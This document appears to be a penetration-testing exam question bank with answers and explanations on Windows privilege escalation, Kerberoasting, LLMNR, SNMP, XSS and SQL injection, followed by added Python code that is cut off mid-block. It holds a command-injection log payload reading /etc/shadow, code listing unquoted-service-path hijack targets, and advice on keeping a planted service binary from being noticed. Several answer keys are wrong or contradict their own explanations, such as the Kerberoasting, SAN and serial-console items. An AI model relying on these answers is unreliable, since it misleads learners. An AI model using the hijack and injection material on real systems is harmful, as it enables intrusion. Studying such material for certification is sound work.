D3
A. Using unquoted service paths B. Replacing executables for writable services Using unquoted paths to services is one way that services can be exploited on a Windows system. By not quoting paths to services, any spaces in a directory name won't be processed correctly and can cause a malicious service executable located deliberately in the resulting unquoted directory path to be loaded instead of the correct service executable. In addition, writable service executable files can be replaced with malicious executables with the same file name.
Which of the following are ways in which services on a Windows system can be exploited? (Choose two.) A. Using unquoted service paths B. Replacing executables for writable services C. Implementing a cold boot attack D. Compromising credentials in LSASS
A. X11 forwarding X11 forwarding can be used to remotely manage Linux systems over a network connection using a graphical user interface.
Which of the following can be used to remotely manage Linux systems over a network connection using a graphical user interface? A. X11 forwarding B. RDP C. ARD D. WMI E. SMB
C. ARD The Apple Remote Desktop (ARD) can be used to remotely manage Macintosh systems over a network connection using a graphical user interface.
Which of the following can be used to remotely manage Macintosh systems over a network connection using a graphical user interface? A. Rlogin B. RDP C. ARD D. PsExec E. RSH
B. RDP The Remote Desktop Protocol (RDP) is used on Windows systems to display the graphical desktop of a remote Windows host on the local system over a network connection. It provides full point-and-click interactivity. It can even be used to transmit sounds from the remote system to the local system and to share files between systems.
Which of the following can be used to remotely manage Windows systems over a network connection using a graphical user interface? A. SMB B. RDP C. PS Remoting D. PsExec E. SSH
A. VNC Virtual Network Computing (VNC) connections can be used to remotely manage Windows, Macintosh, or Linux systems over a network connection using a graphical user interface, as long as the necessary software is installed on both the local and remote systems.
Which of the following can be used to remotely manage Windows, Macintosh, or Linux systems over a network connection using a graphical user interface (as long as the necessary software is installed)? A. VNC B. RDP C. ARD D. WMI E. RSH
B. It lacks security controls. C. A malicious host can advertise itself as any host it wants to. The LLMNR protocol has many security vulnerabilities that can be exploited in a penetration test. For example, it lacks security controls such as authentication. Because of this, a malicious host on the network can advertise itself as any host it wants to.
Which of the following describe the security risks associated with using the LLMNR protocol? (Choose two.) A. Data is transmitted as clear text. B. It lacks security controls. C. A malicious host can advertise itself as any host it wants to. D. It can be used to facilitate a DDoS attack. E. It creates excessive network traffic.
D. EternalBlue E. WannaCry The EternalBlue and WannaCry exploits are facilitated by weaknesses in the SMB protocol. The EternalBlue exploit takes advantage of the fact that SMBv1 mishandles exploit packets, allowing attackers to remotely execute malicious code on the system running the SMB protocol. WannaCry is a form of ransomware that uses EternalBlue to gain access to vulnerable systems and install itself.
Which of the following exploits are facilitated by weaknesses in the SMB protocol? (Choose two.) A. Distributed denial of service (DDoS) B. Fraggle C. Teardrop D. EternalBlue E. WannaCry
B. Kerberoasting The penetration tester in this scenario is using an exploit called Kerberoasting. Any valid domain user can request an SPN for a registered service. The Kerberos ticket received as a result can be taken offline and cracked, potentially exposing the service account password. This can allow privilege escalation because it's not uncommon for the service account to have administrator-level permissions to the local server.
During a gray box penetration test, the tester logs on to the target organization's domain and requests a service principal name (SPN) for a registered service. A ticket is received, and the tester takes it offline and attempts to crack its encryption. What is this exploit called? A. Sandbox escape B. Kerberoasting C. DLL hijacking D. Cold boot attack
A. Emergency fail open Most automatically locking door systems have some type of emergency fail open mechanism. The idea behind this is that if there is an emergency of some sort, such as a fire, then the doors must automatically unlock to prevent people from being trapped inside or preventing emergency personnel from entering. If you can figure out what fail open mechanism is used, you may be able to manually trigger it to open a locked door.
Which of the following features of an egress sensor can be manipulated to allow a penetration tester to enter a building without authorization? A. Emergency fail open B. Automatic locking C. Automatic unlocking via motion sensor for egress D. Automatic unlocking via light sensor for egress
A. LSASS The Local Security Authority Subsystem Service (LSASS) is a process that runs on a Windows system to enforce the security policy on the system. It verifies users that log on to the system, manages user password changes, creates access tokens, and makes entries to the Security log.
Which of the following is a service that runs on a Windows system and enforces the security policy of the system? A. LSASS B. Key distribution center (KDC) C. Group Policy Object (GPO) D. LDAP
A. PsExec PsExec is a command-line utility that is installed by default on Windows systems that lets you interactively execute processes on other Windows systems.
Which of the following is a utility that can be used on Windows systems that allows you to establish command-line access to the console of a remote Windows system, much like the older Telnet client? A. PsExec B. VNC C. RSH D. Rlogin
D. Send spoofed emails to the staff to see if they will respond with sensitive information. In this scenario, since you are trying to perform OSINT on the staff of the company, it would be best to send spoofed emails to the staff to see whether they will respond with sensitive information. Penetration testers need to be ready to incorporate social engineering in their test plan if allowed by the rules of engagement and included in the scope of work.
Which of the following is the best course of action for a penetration tester who is required to perform open-source intelligence (OSINT) on the staff at a target company after completing the infrastructure aspect? A. Go to the client location and use impersonation to obtain information from the staff. B. Using social engineering techniques, try to obtain staff information by calling the company. C. Search the Internet for information on the staff, such as visiting social networking sites. D. Send spoofed emails to the staff to see if they will respond with sensitive information.
A. RPC/DCOM Remote Procedure Call (RPC)/Distributed Component Object Model (DCOM) is used on Windows systems and allows you to remotely execute code on a different Windows system.
Which of the following is used on Windows systems to allow you to remotely execute code on another Windows system somewhere else in the network? A. RPC/DCOM B. X-server C. RSH D. Rlogin
C. Using unsecure file and folder permissions To implement a DLL hijacking exploit, the penetration tester needs to have read/write permissions to the target file system. Using unsecure file and folder permissions can make this task much easier to accomplish.
Which of the following issues could enable a penetration tester to execute a DLL hijacking exploit on a Windows system? A. Failure to install the latest Windows updates B. Using out-of-date virus definitions C. Using unsecure file and folder permissions D. Failure to configure user account restrictions in Group Policy
A. cPassword On a Windows system, cPassword is the name of the attribute that stores passwords in a Group Policy Preference item. Whenever a preference requires a user's password to be saved, it gets stored within this attribute in encrypted format. However, the password can be easily decrypted by any authenticated user in the domain.
Which of the following refers to the name of the attribute that stores passwords in a Windows Group Policy Preference item? A. cPassword B. TGT C. TGS D. LSASS
C. reg save HKLM\System\CurrentControlSet\Services\Sv.reg reg save saves a copy of specified subkeys, entries, and values of the registry in a specified file. A file with the .reg file extension is a registration file used by the Windows Registry. These files can contain hives, keys, and values.
Which of the following should be used if a penetration tester is attempting to achieve persistence by compromising a Windows server? A. net session server | dsquery -user | net use c$ B. powershell && set-executionpolicy unrestricted C. reg save HKLM\System\CurrentControlSet\Services\Sv.reg D. schtasks.exe /create/tr "powershell.exe" Sv.ps1 /run
A. Using scheduled tasks D. Using DLL hijacking DLL hijacking and scheduled tasks can both help retain persistence for an exploit on a Windows system. DLL hijacking causes the exploit contained in the malicious DLL to be loaded every time a linked application is started. Using scheduled tasks ensures that an exploit is run on a regular basis.
Which of the following techniques can be used to help retain persistence for an exploit on a Windows system? (Choose two.) A. Using scheduled tasks B. Using cold boot attacks C. Implementing Kerberoasting D. Using DLL hijacking E. Looking for kernel exploits
A. UDP 161 The SNMP protocol runs on UDP port 161.
Which port is used by the SNMP protocol? A. UDP 161 B. TCP 23 C. TCP 389 D. UDP 88
A. 20 B. 21 By default, an FTP server uses two ports: 20 and 21. Port 20 is used to transfer data between the FTP server and the FTP client. Port 21 is used to send commands between the FTP client and the FTP server.
Which ports are used by an FTP server? (Choose two.) A. 20 B. 21 C. 22 D. 23 E. 25
C. 139 E. 445 The SMB protocol uses TCP ports 139 and 445. A system with these two ports open is most likely a Windows host running SMB or a Linux host running Samba (which is an open source implementation of the SMB service).
Which ports are used by the SMB protocol? (Choose two.) A. 53 B. 80 C. 139 D. 443 E. 445
D. VOIP phones E. SCADA devices VoIP phones and SCADA devices typically cannot be configured in a manner that allows them to meet the security policy requirements of a NAC system. For example, you usually can't install antimalware software on a VoIP phone or a SCADA device. Therefore, these systems are commonly whitelisted in NAC implementations, allowing them to bypass the requirements applied to other systems.
Which types of network devices are commonly whitelisted in many NAC implementations? (Choose two.) A. Laptops B. Desktops C. Servers D. VOIP phones E. SCADA devices
D. Fragmentation attack In a fragmentation wireless attack, a small amount of keying material is extracted from a captured packet. Then, an ARP packet is sent with known content to the access point. If the packet is echoed back by the AP, then even more keying information can be obtained from the returned packet. If this process is repeated over and over, the entire wireless key can be exposed.
Which wireless encryption key cracking exploit involves extracting a small amount of keying material from captured wireless packets and then sending ARP frames to the access point? A. Repeating attack B. Downgrade attack C. Deauth attack D. Fragmentation attack
A. Karma attack In a Karma attack, the tester uses a special wireless device to listen for SSID requests from other devices and then respond as if it were the requested access point. Victims think they are connected to a legitimate network, but they are actually connected directly to the tester. The tester typically forwards victims' traffic to the Internet, so everything seems normal. This allows the tester to inspect the victim's traffic and capture sensitive information.
Which wireless exploit uses a special wireless device to listen for SSID requests from other wireless devices and then impersonate the requested access point? A. Karma attack B. Deauth attack C. Downgrade attack D. Rogue access point
C. Attempt RID cycling to enumerate users and groups. One of the first steps when looking to gain access to a host, system, or application is to enumerate usernames. Once usernames are guessed, targeted password-based attacks can then be attempted. A RID cycling attack attempts to enumerate user accounts through null sessions. If a tester specifies a password file, it will automatically attempt to brute force the user accounts when it's finished enumerating. So, in this scenario, attempting RID cycling will be the next step the tester should try.
You are a penetration tester and have found a vulnerability in the client's domain controller. The vulnerability is that null sessions are enabled on the domain controller. What type of attack can be performed to take advantage of this vulnerability? A. Attempt a pass-the-hash attack to relay credentials. B. Attempt password brute forcing to log into the host. C. Attempt RID cycling to enumerate users and groups. D. Attempt session hijacking to impersonate a system account.
D. The tester compromised an account and needs to dump hashes and plaintext passwords from the system. Kerberoasting is a technique that relies on requesting service tickets for service account service principal names (SPNs). The tickets are encrypted with the password of the service account associated with the SPN, meaning that once a tester has obtained the service tickets by using a tool like Mimikatz, the tester can crack the tickets to obtain the service account password using offline cracking tools.
You are a penetration tester and looking at performing a Kerberoasting attack. Given the following situations, in which one would you perform a Kerberoasting attack? A. The tester compromised a Windows device and dumps the Local Security Authority (LSA) secrets. B. The tester needs to retrieve the Security Account Manager (SAM) database and crack the password hashes. C. The tester compromised a user account that has limited privileges and needs to target other accounts for lateral movement. D. The tester compromised an account and needs to dump hashes and plaintext passwords from the system.
C. HKEY_CURRENT_USER If a tester has access to a Windows workstation or server, then they can use PowerSploit, which provides the toolkit needed to maintain persistence and to perform further reconnaissance. The tester will want to exploit the HKEY_CURRENT_USER registry hive. The HKEY_CURRENT_USER hive is meant to be available only to the currently logged on user. So, when a different Windows user logs onto the system, a different copy of the HKEY_CURRENT_USER registry hive is loaded. The HKEY_CURRENT_USER registry hive is saved locally as the file NTUSER.DAT or USER.DAT when a user logs off. This registry hive can be opened in Notepad, and the encrypted login ID and password can be easily located. If the user has a roaming profile, then the NTUSER.DAT file will be saved on every workstation the user logged onto.
You are a penetration tester, and while conducting a test, you are trying to maintain persistence on a Windows system that has limited privileges. What registry key should you use? A. HKEY_CLASSES_ROOT B. HKEY_CURRENT_CONFIG C. HKEY_CURRENT_USER D. HKEY_LOCAL_MACHINE
C. Impersonation E. Elicitation Impersonation is a social engineering technique that can be used by a penetration tester to gain the trust of the target organization's employees. In this scenario, the employees trusted the tester because emails appeared to be coming from another employee. The tester leveraged this trust to elicit sensitive information from those employees. This is sometimes called business email compromise.
You are performing a black box penetration test for a medium-sized manufacturing organization. Using reconnaissance and phishing techniques, you have compromised the password for an employee's email account. You use this account to question other employees in an attempt to gather sensitive information and documents. Which exploits did you use in this scenario? (Choose two.) A. Shoulder surfing B. Phishing C. Impersonation D. Interrogation E. Elicitation
C. Switch spoofing This is an example of a switch spoofing exploit that is used for VLAN hopping. In a switch spoofing exploit, the tester's network board is reconfigured to emulate a trunk port on a network switch. By doing this, the real switch will think it needs to forward traffic from all VLANs to the tester's device.
You are performing a gray box penetration test. To capture information from multiple VLANs, you have configured the network board in your computer to emulate a trunk port on a network switch. Your goal is to get the real switch to forward traffic from all VLANs to your device. What is this exploit called? A. MAC address spoofing B. Double-tagging C. Switch spoofing D. Evil twin
A. The bands and frequencies of the wireless devices used by the client In this scenario, the penetration tester would need to receive the bands and frequencies used by the client's wireless devices to proceed with the wireless penetration test. Wireless devices may operate on a number of bands and frequencies, and knowing the exact bands and frequencies would allow a penetration tester to conduct the wireless penetration test as requested.
A client has requested that a wireless penetration test be done. Which scoping target information will most likely be needed before testing can start? A. The bands and frequencies of the wireless devices used by the client B. The preferred wireless access point vendor of the client C. The number of wireless devices owned by the client D. The physical location and network ESSIDs to be tested
D. JTAG debug exploit The JTAG port is implemented in motherboards made by some manufacturers for diagnostic and testing purposes. With the right equipment, a penetration tester can connect to this port and capture data directly from the running motherboard.
A penetration tester connects a special device to a diagnostic port implemented in the motherboard by the manufacturer and is able to capture data from system registers. What type of exploit occurred in this scenario? A. Cold boot attack B. Shell upgrade exploit C. VM escape exploit D. JTAG debug exploit
B. Tailgating Tailgating occurs when an intruder tags along with an authorized person through a physical barrier, such as a locking door or a turnstile. This happens with the authorized person's knowledge and/or consent.
A penetration tester enters the target organization's physical facility by striking up a conversation with an employee in the parking lot and walking with her through a door that uses a proximity badge reader to control access. The employee uses her badge to open the door and holds it open for the penetration tester. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Badge cloning
A. Piggybacking Piggybacking occurs when an intruder tags along with an authorized person through a physical barrier, such as a locking door or a turnstile. This happens without the authorized person's knowledge or consent.
A penetration tester enters the target organization's physical facility by walking behind an employee and grabbing the authentication-protected door before it shuts all of the way. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Badge cloning
A. To share files on the network C. To share printers on the network The Server Message Block (SMB) protocol is used to share files and printers between hosts on a network.
What are the functions of the Server Message Block (SMB) protocol? (Choose two.) A. To share files on the network B. To transfer email messages between mail transfer agents (MTAs) C. To share printers on the network D. To map IP addresses to MAC addresses E. To transfer email messages to a mail user agent (MUA)
B. The HTTP POST method Forms in HTML can use either method="POST" or method="GET" (default) in the <form> element. The method specified determines how form data is submitted to the server. With GET, the parameters remain in the browser history because they become part of the URL. With POST, parameters are not saved in browser history. GET is less secure compared to POST because data sent is part of the URL.
A penetration tester is conducting a test on a web application and discovers that the user login process sends form field data by using the HTTP GET method. To reduce the risk of exposing sensitive data, the HTML form should be sent by using which of the following? A. The HTTP OPTIONS method B. The HTTP POST method C. The HTTP PUT method D. The HTTP TRACE method
A. NetBIOS NetBIOS is a transport protocol used by Windows systems to share resources, such as shared folders or printers. Once an attacker identifies that port 139 is open on a device, NBTSTAT can be used to footprint the device. For example, you could discover the device's computer name and identify whether it is a workstation or a server. All of this information can be gathered without any kind of authentication.
A penetration tester is performing a gray box test for a client. During a network scan, she notices a host that has TCP port 139 open. She suspects this is a Windows system, so she runs the NBTSTAT command and discovers key information about the host. Which protocol on the remote host allowed the tester to gather this information? A. NetBIOS B. SNMP C. NAC D. SMTP
D. Provides extended site validation Subject Alternative Name (SAN) is an extension to X.509 that allows various values to be associated with a security certificate using a subjectAltName field. These values are called SANs and include email addresses, IP addresses, URLs, DNS names, directory names, and other names followed by a value. Using SAN provides extended site validation.
A security administrator is trying to encrypt communication by using the Subject Alternative Name (SAN) attribute of a certificate. What is a reason why the administrator should take advantage of SAN? A. Can protect multiple domains B. Does not require a trusted certificate authority (CA) C. Protects unlimited subdomains D. Provides extended site validation
B. Command injection In this scenario, a command was entered, and the attacker was attempting to gain access to the password file within the /etc directory. Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via vulnerable applications. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell.
A tester discovers the following log entry on a server: Dec 23 2018 00:22:16 httpd[2342]: GET /app2/prod/proc/process.php?input=change;cd%20../../../etc;cat%20shadow What type of attack was being attempted? A. Buffer overflow B. Command injection C. Cross-site scripting D. Password attack
B. Hidden elements The programmer in this scenario has used hidden elements in the HTML code. This is an unsecure coding practice that can result in sensitive information being stored in the user's browser (the DOM).
A web application developer included the following HTML code within a form page: <input type=hidden> This is an example of which unsecure code practice? A. Comments in source code B. Hidden elements C. Unauthorized use of functions/unprotected APIs D. Race conditions
D. Hard-coded credentials The programmer in this scenario has used hard-coded credentials. If an attacker (or a penetration tester) were to view the application's source code, they would have access to the database authentication credentials.
A web application programmer has included the username and password required to access a database instance within the application's PHP code. This is an example of which unsecure code practice? A. Comments in source code B. Race conditions C. Unauthorized use of functions/unprotected APIs D. Hard-coded credentials
B. They are prone to data emanation. The risk associated with enabled serial console connections on network devices is the fact that network administrators tend to not secure them properly. Because they can be accessed only with a direct point-to-point connection, administrators don't configure them to require authentication. This makes it easy for a penetration tester to access the device, as long as they can gain physical access to it (for example, by using impersonation).
What are the risks of enabling serial console connections on network devices such as routers and switches? A. Network administrators tend to not secure them properly. B. They are prone to data emanation. C. It is easy for attackers to connect to them. D. It is easy for attackers to sniff data from them.
D. Hashed account passwords The SAM database on a Windows system contains hashed passwords for local accounts. It is located in C:\Windows\System32\config\ by default. If a copy of this file can be made, it can be cracked using a number of different tools available on the Internet to expose the passwords it contains.
What is stored in the SAM database on a Windows system? A. Security log entries B. Digital signatures associated with each application installed on the system C. Group Policy settings D. Hashed account passwords
C. Implement a strict HSTS policy that prevents a user's browser from opening a page unless an HTTPS connection has been used. The best way to defend against an SSL stripping attack is to implement an HTTP Strict Transport Security (HSTS) policy that prevents a user's browser from opening a web page unless an HTTPS connection has been used to transfer the page from the web server to the client.
What is the best way to defend against an SSL stripping attack? A. Update the virus definitions on user's workstations. B. Implement a network intrusion detection (NID) device. C. Implement a strict HSTS policy that prevents a user's browser from opening a page unless an HTTPS connection has been used. D. Reconfigure all browsers to require TLS sessions.
B. To transfer email messages between mail transfer agents (MTAs) The SMTP protocol is used to transfer email messages between mail transfer agents (MTAs).
What is the function of the Simple Mail Transfer Protocol (SMTP)? A. To share files on the network B. To transfer email messages between mail transfer agents (MTAs) C. To map IP addresses to MAC addresses D. To transfer email messages to a mail user agent (MUA)
C. Ret2libc On Linux systems, the Ret2libc exploit causes the return address of a subroutine to be replaced by the address of a subroutine that is already present in a process's memory.
Which Linux exploit causes the return address of a subroutine to be replaced by the address of a subroutine that is already present in a process's memory? A. SGID B. Sticky bit C. Ret2libc D. Unsecure sudo
C. Sticky bit When the sticky bit permission is assigned to a directory on a Linux system, users can delete only the files in that directory that they own, even if they have write and execute permissions to the directory.
Which Linux special permission, when assigned to a directory, prevents users from deleting files they do not own, even if they have write and execute permissions to the directory? A. SGID B. SUID C. Sticky bit D. Ret2libc
A. Unattended installations via PXE Running unattended installations over the network using the Preboot Execution Environment (PXE) could potentially result in authentication credentials being transferred as clear text. During the unattended install, a special file called the answer file is used to automate the installation process. If the answer file contains user account information to be created on the system during the install, that information is transferred as clear text.
Which Windows feature could potentially allow authentication credentials to be transferred as clear text over a network connection? A. Unattended installations via PXE B. JTAG debug C. Remote Desktop D. Domain join
A. Parameter pollution B. Insecure direct object reference exploit In both a parameter pollution exploit and an insecure direct object reference exploit, the penetration tester modifies a parameter in an HTTP request to gain unauthorized access to information. For example, after authenticating to a web application, the tester could modify the /search?q= parameter in a URL to trick the application into supplying information that the user account shouldn't be able to see.
Which authorization exploits modify a parameter in an HTTP request to gain unauthorized access to information? (Choose two.) A. Parameter pollution B. Insecure direct object reference exploit C. Cross-site scripting attack D. Cross-site request forgery E. Redirect attack
D. Document Object Model (DOM) In a DOM XSS exploit, the attacker exploits weaknesses in the victim's web browser. Typically, outdated browsers are most susceptible to this type of exploit. This is considered to be a client-side XSS attack.
Which form of a cross-site scripting (XSS) attack leverages an older, vulnerable web browser being run locally on the victim's computer? A. Stored/persistent B. Clickjacking C. Reflected D. Document Object Model (DOM)
A. Stored/persistent B. Reflected Both the stored/persistent and reflected XSS exploits are considered server-side exploits because the malicious scripts are embedded on a server. When the user views the web page, the malicious scripts run, allowing the attacker to capture information or perform other actions.
Which forms of a cross-site scripting (XSS) attack are considered to be server-side exploits? (Choose two.) A. Stored/persistent B. Reflected C. Document Object Model (DOM) D. Clickjacking E. Directory traversal
A. Double-tagging Double-tagging of VLAN tags is allowed in the 802.1Q specification. This allows a host to "hop" between VLANs.
Which method is commonly used to hop between VLANs? A. Double-tagging B. Brute-force attacks C. MAC address spoofing D. DNS poisoning
B. Shell upgrade C. Virtual machine (VM) escape D. Container escape Shell upgrade, VM escape, and container escape are all examples of sandbox escape exploits.
Which of the following are examples of sandbox escape exploits? (Choose three.) A. Cold boot attacks B. Shell upgrade C. Virtual machine (VM) escape D. Container escape E. Ret2libc F. JTAG debug
A. Including comments in the source code E. Providing verbose error messages While commenting an application's source code is a best practice for programmers, it can also create a security vulnerability because it provides an attacker (or penetration tester) who views the source code with extensive information about how the application works. Likewise, providing overly verbose error messages may be a best practice while programming the application, but leaving them in the released application can provide an attacker with valuable information.
Which of the following are examples of unsecure coding practices? A. Including comments in the source code B. Checking input fields for properly formatted information C. Including subroutines for handling error conditions D. Digitally signing the code E. Providing verbose error messages
C. Lack of error handling routines D. Lack of code signing The programmer should be sure to include routines that tell the application what to do should it encounter an error condition. For example, many buffer overflow attacks exploit applications that don't know how to respond when they receive more information than they were expecting. Likewise, all applications should have their code digitally signed. This will expose any unauthorized modifications made to the code.
Which of the following are examples of unsecure coding practices? (Choose two.) A. Removing comments from the source code before release B. Checking input fields for properly formatted information C. Lack of error handling routines D. Lack of code signing E. Removing overly verbose error messages
A. It is commonly used in the absence of a DNS server. E. It allows the IPv6 host to resolve hostnames on the same local link. The LLMNR protocol is loosely based on the DNS packet format and allows IPv4 and IPv6 hosts to resolve the names of other hosts on the same local link without a DNS server: the query is sent to a link-local multicast address (224.0.0.252 or FF02::1:3) on UDP port 5355, and the host owning the name answers directly. It is supported by both Windows and Linux hosts (on Linux through systemd-resolved). Because any host on the link may answer a query, LLMNR is a favourite poisoning target on internal penetration tests, which is why hardening guides recommend disabling it when DNS is available.
Which of the following are true of the Link-Local Multicast Name Resolution (LLMNR) protocol? (Choose two.) A. It is commonly used in the absence of a DNS server. B. It is not supported by Linux hosts. C. It is not supported by Windows hosts. D. It is used only by routers, not by workstations or servers. E. It allows the IPv6 host to resolve hostnames on the same local link.
A. The community string is valid for every SNMPv1 node. B. The community string is transmitted as clear text. SNMPv1 is an older protocol that uses a community string as its only credential; it functions as a shared password. In practice the same community string is configured on every SNMPv1 host in the network, so recovering it once gives access to all of them, and by convention many administrators leave the defaults in place (public for read access, private for read/write). Even where a unique community string is used, it is easy to discover because SNMPv1 has no encryption at all: the string travels as clear text in every packet and can be read off the wire by anyone who can capture traffic. Only SNMPv3 adds real authentication and privacy.
Which of the following are vulnerabilities associated with the SNMPv1 protocol? (Choose two.) A. The community string is valid for every SNMPv1 node. B. The community string is transmitted as clear text. C. The community string uses the weak RC2 cipher. D. No authentication is required to communicate with an SNMPv1 host. E. The Management Information Base (MIB) is stored in unencrypted format.
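To make the clear-text point concrete, here is an added example (not part of the original page) that builds an SNMPv1 GetRequest from scratch and then reads the community string straight back out of the raw bytes, which is all a sniffer on the wire has to do. The packet is constructed in code; nothing is sent on the network, and the community string and OID are assumptions for the demo.

```python
# Added example (not from the original page): build an SNMPv1 GetRequest and
# read the community string straight back out of the raw bytes, which is all a
# network sniffer has to do because SNMPv1 carries it in clear text.
# The packet below is constructed in code; no network I/O is performed.


def ber_length(n: int) -> bytes:
    """BER length field: one byte if < 128, otherwise long form."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, payload: bytes) -> bytes:
    """One BER tag-length-value element."""
    return bytes([tag]) + ber_length(len(payload)) + payload


def ber_int(n: int) -> bytes:
    """ASN.1 INTEGER, two's complement, minimal length (non-negative values only)."""
    return tlv(0x02, n.to_bytes(n.bit_length() // 8 + 1, "big", signed=True))


def encode_oid(dotted: str) -> bytes:
    """Dotted OID -> BER content bytes (first two arcs packed, rest base-128)."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return bytes(out)


def build_getrequest(community: str, oid: str, request_id: int = 1) -> bytes:
    """SNMPv1 GetRequest (version field 0) for a single OID with a NULL value."""
    varbind = tlv(0x30, tlv(0x06, encode_oid(oid)) + tlv(0x05, b""))
    pdu = tlv(0xA0, ber_int(request_id) + ber_int(0) + ber_int(0) + tlv(0x30, varbind))
    return tlv(0x30, ber_int(0) + tlv(0x04, community.encode("ascii")) + pdu)


def read_tlv(buf: bytes, pos: int):
    """Return (tag, value, position after the element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def parse_community(packet: bytes):
    """Return (version, community) from an SNMPv1/v2c message; raise on v3."""
    tag, msg, _ = read_tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    tag, ver, pos = read_tlv(msg, 0)
    if tag != 0x02:
        raise ValueError("missing version field")
    version = int.from_bytes(ver, "big", signed=True)
    tag, community, _ = read_tlv(msg, pos)
    if tag != 0x04:  # SNMPv3 puts a SEQUENCE (msgGlobalData) here instead
        raise ValueError("no clear-text community string (SNMPv3?)")
    return version, community.decode("latin-1")


if __name__ == "__main__":
    pkt = build_getrequest("public", "1.3.6.1.2.1.1.1.0")  # sysDescr.0, constructed
    print(pkt.hex())
    print(parse_community(pkt))
```

The same header layout (version, then community) is shared by SNMPv2c, so the parser reads v2c traffic too; it deliberately fails on SNMPv3, where the second element is a SEQUENCE and the authentication material is not a reusable clear-text string.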
D. By attempting privilege escalation attacks Privilege escalation attacks are frequently categorized into two major types: vertical and horizontal. Vertical escalation attacks focus on gaining higher privileges. Horizontal escalation attacks move sideways to other accounts or services that have the same level of privileges. An unquoted service path is a Windows vulnerability. When a service starts, the Service Control Manager launches the executable named in the service's ImagePath. If that path contains spaces and is not surrounded by quotation marks, Windows does not know where the executable name ends and the arguments begin, so it tries each space-delimited prefix in turn (for a path under C:\Program Files\Vendor App\ it first looks for C:\Program.exe, then C:\Program Files\Vendor.exe, and so on). If the tester can write to one of those directories, the planted executable runs the next time the service starts, with the service account's privileges, which is often LocalSystem. Exploiting it therefore needs all three conditions: spaces in the path, no quotes, and a writable directory along the path, plus a way to restart the service or reboot the host.
A penetration tester has found a few unquoted service paths during a test of a client's network. How can the tester use these vulnerabilities to his advantage? A. By attempting to crack the service account passwords B. By attempting DLL hijacking attacks C. By attempting to locate weak file and folder permissions D. By attempting privilege escalation attacks
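The following is an added example, not code from the original page: it reproduces the path search that CreateProcess performs for an unquoted ImagePath and flags the candidates a tester could plant if the containing directory is writable. The service path and the set of "writable" directories are constructed for the demo; on a real host they come from the SCM/registry and from an ACL check with icacls or Get-Acl.

```python
# Added example (not from the original page): reproduce the path search that
# CreateProcess performs for an unquoted service ImagePath, and flag the
# candidates a tester could plant if the containing directory is writable.
# The service path and the "writable directory" set are constructed for the
# demo; on a real host they come from the registry/SCM and from an ACL check.
import ntpath


def hijack_candidates(image_path: str) -> list:
    """Executables Windows will try before the intended one, in order.

    Windows splits an unquoted path at each space, appends .exe when the
    prefix has no extension, and runs the first file that exists.
    """
    path = image_path.strip()
    if path.startswith('"') or " " not in path:
        return []                      # quoted, or no spaces: nothing to hijack
    parts = path.split(" ")
    candidates = []
    for i in range(1, len(parts) + 1):
        prefix = " ".join(parts[:i])
        if prefix.lower().endswith(".exe"):
            break                      # reached the binary the admin intended
        candidates.append(prefix + ".exe")
    else:
        candidates.pop()               # no .exe anywhere: last prefix is the real target
    return candidates


def exploitable(image_path: str, writable_dirs: set) -> list:
    """Candidates whose parent directory the current user can write to."""
    writable = {d.lower() for d in writable_dirs}
    return [c for c in hijack_candidates(image_path)
            if ntpath.dirname(c).lower() in writable]


if __name__ == "__main__":
    # Enumerating real targets on Windows (run there, not here):
    #   Get-CimInstance Win32_Service |
    #     Where-Object { $_.PathName -match ' ' -and $_.PathName -notmatch '^"' } |
    #     Select-Object Name, PathName, StartName
    # then check each directory on the path with icacls / Get-Acl.
    svc = r"C:\Program Files\Vendor App\bin\svc host.exe -run"   # constructed
    for c in hijack_candidates(svc):
        print("would try:", c)
    print("plantable :", exploitable(svc, {r"C:\Program Files\Vendor App\bin"}))
```

Note that the highest-value candidate is usually the deepest one: vendors' own application directories are far more likely to be writable by ordinary users than C:\ or C:\Program Files, and the planted binary should relaunch the real service executable so the service does not visibly fail.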
E. Use a blacklist validation for the SQL statements. F. Use a whitelist validation for the SQL statements. Given this scenario, the client will want to add blacklist and whitelist validation in front of the SQL statements. SQL injection is a common attack route in which malicious input is assembled into a back-end database query to read or change data the application never intended to expose; it remains one of the most common web attacks. Blacklist validation tests the external input against a set of known malicious patterns. Whitelist validation tests the external input against a set of known, approved values or formats: the application knows exactly what it expects and rejects everything else. Of the two, whitelisting is far more robust, because blacklists are routinely bypassed with alternate encodings, comment sequences, and keywords the list did not anticipate. Both are a short-term mitigation only; the durable fix is parameterized queries (prepared statements), which the client has ruled out here as an architectural change.
A penetration tester has recently finished a test that revealed that a legacy web application is vulnerable to SQL injections. The client indicates that remediating the vulnerability would require an architectural change and that management does not want to risk anything happening to the current application. Which of the following conditions would minimize the SQL injection risk while providing a low-effort and short-term solution? (Choose two.) A. Identify and remove the dynamic SQL from the stored procedures. B. Identify and remove the inline SQL statements from the code. C. Identify and sanitize all user inputs. D. Identify the source of malicious input and block the IP address. E. Use a blacklist validation for the SQL statements. F. Use a whitelist validation for the SQL statements.
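As an added example (not code from the original page), the block below puts the legacy pattern the question describes, SQL built by string concatenation, next to a blacklist filter, a whitelist filter and a parameterized query, and runs all four against a throwaway SQLite database so the blacklist bypass can actually be observed. Table contents and passwords are constructed; a real application would store password hashes.

```python
# Added example (not from the original page): the legacy pattern the question
# describes (SQL built by string concatenation) next to a blacklist filter, a
# whitelist filter and a parameterized query, run against a throwaway SQLite
# database so the bypass can be observed. Table contents are constructed and
# passwords are stored in clear text only to keep the demo short.
import re
import sqlite3

BLACKLIST = re.compile(r"\b(or|and|union|select)\b|--|;", re.IGNORECASE)
WHITELIST = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")   # username-style field


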